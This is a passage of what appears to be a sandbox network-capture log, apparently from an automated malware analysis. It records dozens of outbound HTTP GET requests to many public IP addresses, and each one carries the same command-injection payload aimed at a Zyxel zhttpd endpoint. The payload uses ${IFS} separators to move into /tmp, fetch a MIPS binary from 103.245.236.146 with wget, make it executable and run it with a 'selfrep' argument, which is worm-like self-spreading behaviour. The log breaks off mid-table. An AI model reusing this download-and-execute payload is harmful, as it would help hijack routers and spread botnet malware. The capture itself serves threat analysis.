                                                        Jan 28, 2024 10:13:01.582492113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6704192.168.2.145399096.200.27.223443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.582528114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6705192.168.2.144105889.233.245.251443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.582582951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6706192.168.2.146008485.202.44.57443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.582591057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6707192.168.2.1440346124.243.23.154443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.582642078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6708192.168.2.145774827.248.13.64443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.582673073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6709192.168.2.1439064194.201.125.170443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.582703114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6710192.168.2.1432920129.0.208.93443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.582752943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6711192.168.2.1440474111.255.224.166443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.582801104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6712192.168.2.1435926135.212.226.159443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.582829952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6713192.168.2.146086080.54.113.168443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.582879066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6714192.168.2.143718665.66.92.82443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.582926989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6715192.168.2.1446776173.124.85.243443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.582961082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6716192.168.2.1438266122.207.164.96443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.583009958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6717192.168.2.1456576212.58.188.134443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.583033085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6718192.168.2.1439086219.25.146.159443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.583074093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6719192.168.2.144249280.88.97.198443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.583126068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6720192.168.2.1459536159.52.72.139443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.583148956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6721192.168.2.145373217.89.238.38443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.583188057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6722192.168.2.1460922131.103.0.84443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.583220005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6723192.168.2.144699232.243.220.26443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.583256960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6724192.168.2.1435448108.159.24.228443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.583283901 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6725192.168.2.143442496.226.79.27443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.583334923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6726192.168.2.144531696.217.109.220443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.583364964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6727192.168.2.143657495.106.141.190443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.583398104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6728192.168.2.143564493.27.128.125443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.583436012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6729192.168.2.144154671.52.106.250443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.583463907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6730192.168.2.145433631.137.40.194443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.583517075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6731192.168.2.1448086114.242.13.147443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.583547115 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6732192.168.2.1451048116.180.129.38443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.583580017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6733192.168.2.1458086121.78.79.144443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.583614111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6734192.168.2.145161057.139.250.29443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.583636045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6735192.168.2.145208075.222.7.172443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.583693027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6736192.168.2.145271853.249.152.211443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.583719969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6737192.168.2.145064264.133.181.46443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.583769083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6738192.168.2.1437524109.246.135.89443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.583827019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6739192.168.2.14500008.195.205.156443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.583874941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6740192.168.2.1446216220.9.0.204443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.583929062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6741192.168.2.1439370164.77.244.10443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.583965063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6742192.168.2.1434850189.105.2.71443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.583996058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6743192.168.2.145879073.45.216.24443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.584053040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6744192.168.2.145065253.177.147.208443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.584083080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6745192.168.2.1445702125.207.121.26443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.587346077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6746192.168.2.1455426155.15.200.11443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.587393045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6747192.168.2.1451668107.130.173.127443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.587420940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6748192.168.2.1454524124.99.134.199443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.587472916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6749192.168.2.1457488138.252.20.240443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.580755949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6750192.168.2.1460242140.216.82.100443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.580854893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6751192.168.2.1455482130.35.211.139443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.580883026 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6752192.168.2.1448846135.97.242.163443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.580919027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6753192.168.2.1450266132.165.248.149443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.580951929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6754192.168.2.1435514166.189.239.130443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.581007004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6755192.168.2.143860661.9.249.247443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.581011057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6756192.168.2.143326875.192.92.133443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.581082106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6757192.168.2.1440256192.167.57.12443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.581089020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6758192.168.2.1460266210.23.212.26443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.581156015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6759192.168.2.1442696104.201.115.4443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.581192970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6760192.168.2.1451090158.109.29.148443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.581238031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6761192.168.2.145437037.29.166.242443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.581253052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6762192.168.2.144341863.228.247.26443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.581294060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6763192.168.2.145253477.90.122.201443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.581343889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6764192.168.2.146008452.159.195.150443
                                                        TimestampBytes transferredDirectionData
